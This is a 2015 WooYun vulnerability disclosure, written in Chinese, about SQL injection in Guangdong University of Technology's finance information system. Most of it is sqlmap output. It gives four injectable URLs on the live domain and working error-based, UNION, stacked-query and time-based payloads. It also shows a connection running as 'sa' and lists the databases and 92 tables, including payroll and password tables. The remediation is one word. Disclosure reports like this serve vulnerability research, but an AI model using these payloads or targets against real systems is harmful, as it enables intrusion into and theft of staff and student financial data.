漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-091360
漏洞标题:广东工业大学财务信息查询系统SQL注入(附带四处)
相关厂商:广东工业大学
漏洞作者: YuShen
提交时间:2015-01-14 12:50
修复时间:2015-01-19 12:52
公开时间:2015-01-19 12:52
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-01-14: 细节已通知厂商并且等待厂商处理中
2015-01-19: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
SQL注入
详细说明:
SQL注入!
漏洞证明:
注入点:
http://cwc.gdut.edu.cn/cwwj/cwwj.asp?lx=%C4%BC
http://cwc.gdut.edu.cn/fwzn/fwzn.asp?lx=%D6%B0
http://cwc.gdut.edu.cn/gzzd/showinfo.asp?ID=41
http://cwc.gdut.edu.cn/gg/showinfo.asp?id=605
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: lx
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: lx=%C4%BC' AND 2584=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(12
1)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (2584=2584) THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(113)+CHAR(118)+CHAR(119)+CHAR(114)+CHAR(113))) AND 'iBct'='iBct
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: lx=%C4%BC' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(112)+CHAR(121)
+CHAR(98)+CHAR(113)+CHAR(120)+CHAR(84)+CHAR(89)+CHAR(71)+CHAR(74)+CHAR(103)+CHAR
(88)+CHAR(88)+CHAR(71)+CHAR(103)+CHAR(113)+CHAR(118)+CHAR(119)+CHAR(114)+CHAR(11
3),NULL,NULL,NULL,NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: lx=%C4%BC'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: lx=%C4%BC' AND 3203=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers
AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sys
users AS sys7) AND 'Orwo'='Orwo
---
[13:54:19] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, ASP
back-end DBMS: Microsoft SQL Server 2005
[13:54:19] [INFO] fetched data logged to text files under 'C:\Documents and Sett
ings\Administrator\.sqlmap\output\cwc.gdut.edu.cn'
[*] shutting down at 13:54:19
current user: 'sa'
current database: 'oa88'
available databases [6]:
[*] master
[*] model
[*] msdb
[*] oa88
[*] tempdb
[*] ykt
Database: oa88
[92 tables]
+---------------------+
| CJKC |
| CRZ_nw |
| D99_Tmp |
| GGXSMS_DK |
| GGXSMS_Dep |
| GGXSMS_jdj |
| Gdbf22 |
| Gdbf22 |
| JJ0209 |
| NHKK0815 |
| PAYMX08 |
| bgxx |
| bgxz |
| bk_dkxf |
| bk_jbzl |
| bk_jxj |
| bk_qtjj |
| bk_sfhz |
| bk_yhdk |
| bk_ylhz |
| bmjcj |
| cdbf1 |
| cj0908 |
| cjls |
| crzjxj |
| ctgz0706 |
| cttx0706 |
| cttx0706 |
| ctzz |
| cwdt |
| cwwj |
| cwyenf |
| cwyenf |
| cwzk_old |
| cwzk_old |
| dep_kemu |
| dep_kemu |
| dtproperties |
| fwzn |
| gdbf1 |
| gg |
| ggxsms_sfhz_cj |
| ggxsms_zy |
| gjj |
| grbt2 |
| grbt2 |
| grbt2 |
| grbt3 |
| gz_jtbtmx |
| gz_qtbtmx |
| gzzd |
| jtbt |
| kemu_mc |
| kydk |
| nhzh |
| pangolin_test_table |
| pay_hz |
| pay_mx_info |
| payhz07 |
| payhz08 |
| payhz09 |
| payhz10 |
| payhz11 |
| payhz12 |
| payhz13 |
| payhz14 |
| payhz_all11 |
| payhz_all12 |
| payhz_all13 |
| payhz_all14 |
| qtbt |
| xm |
| xmzd201305 |
| xmzd201305 |
| xmzd20140321 |
| yhqx |
| yjj20140227 |
| yjjpwd20140227 |
| zwbmzd |
| zwfzje |
| zwkmje |
| zwpzb |
| zwpzfl2008 |
| zwpzfl2008 |
| zwpzfl2009 |
| zwpzfl2010 |
| zwpzfl2011 |
| zwpzfl2012 |
| zwpzfl2013 |
| zwxmje |
| zwxmzd |
| zwzfdz |
+---------------------+
修复方案:
过滤!
版权声明:转载请注明来源 YuShen@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-01-19 12:52
厂商回复:
最新状态:
暂无